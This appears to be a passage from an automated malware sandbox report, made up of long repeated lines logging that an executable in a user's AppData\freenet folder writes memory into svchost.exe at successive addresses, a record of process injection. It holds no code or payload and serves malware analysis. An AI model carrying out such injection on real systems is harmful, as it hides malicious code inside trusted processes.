Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A074Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A078Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A07CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A080Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A084Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A088Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A08CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A090Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A094Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A098Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A09CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0A0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0A4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0A8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0ACJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0B0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0B4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0B8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0BCJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0C0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0C4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0C8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0CCJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0D0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0D4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0D8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0DCJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0E0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0E4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0E8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0ECJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0F0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0F4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0F8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A0FCJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A100Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A104Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A108Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A10CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A110Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A114Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A118Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A11CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A120Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A124Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A128Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A12CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A130Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A134Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A138Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A13CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A140Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A144Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A148Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A14CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A150Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A154Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A158Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A15CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A160Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A164Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A168Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A16CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A170Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A174Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A178Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A17CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A180Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A184Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A188Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A18CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A190Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A194Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A198Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A19CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1A0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1A4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1A8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1ACJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1B0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1B4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1B8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1BCJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1C0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1C4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1C8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1CCJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1D0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1D4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1D8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1DCJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1E0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1E4Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1E8Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1ECJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A1F0Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 70000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: F0000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A004Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A008Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A00CJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A010Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A014Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 1001A018Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
